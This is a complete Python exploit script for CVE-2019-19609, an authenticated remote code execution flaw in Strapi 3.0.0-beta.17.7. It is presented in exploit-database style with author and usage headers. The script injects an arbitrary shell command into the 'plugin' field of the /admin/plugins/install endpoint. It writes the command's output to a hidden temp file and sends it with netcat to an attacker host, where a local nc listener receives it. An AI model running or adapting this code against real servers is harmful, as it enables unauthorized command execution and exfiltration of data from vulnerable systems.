# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) # Date: 29/08/2021 # Exploit Author: David Utón (M3n0sD0n4ld) # Vendor Homepage: https://strapi.io/ # Affected Version: strapi-3.0.0-beta.17.7 and earlier # Tested on: Linux Ubuntu 18.04.5 LTS # CVE : CVE-2019-19609 #!/usr/bin/python3 # Author: @David_Uton (m3n0sd0n4ld) # Github: https://m3n0sd0n4ld.github.io # Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST import requests, sys, os, socket logoType = (''' ===================================== CVE-2019-19609 - Strapi RCE ------------------------------------- @David_Uton (M3n0sD0n4ld) https://m3n0sd0n4ld.github.io/ ===================================== ''') if __name__ == '__main__': # Parameter checking if len(sys.argv) != 5: print(logoType) print("[!] Some of these parameters are missing.") print(''' Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST Example: python3 10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % sys.argv[0]) # Exploit run else: # Paremeters url = sys.argv[1] token = sys.argv[2] command = sys.argv[3] lhost = sys.argv[4] lport = 9999 s = requests.session() r = s.post(url, verify=False) # SSL == verify=True headersData = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Authorization': "Bearer %s" % token } postData = { "plugin":"documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport) } print(logoType) os.system("nc -nvlp 9999 &") try: print("[+] Successful operation!!!") r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False) # SSL == verify=True # Content print print(r.text) except: print("[!] An error occurred, try again.") sys.exit(1)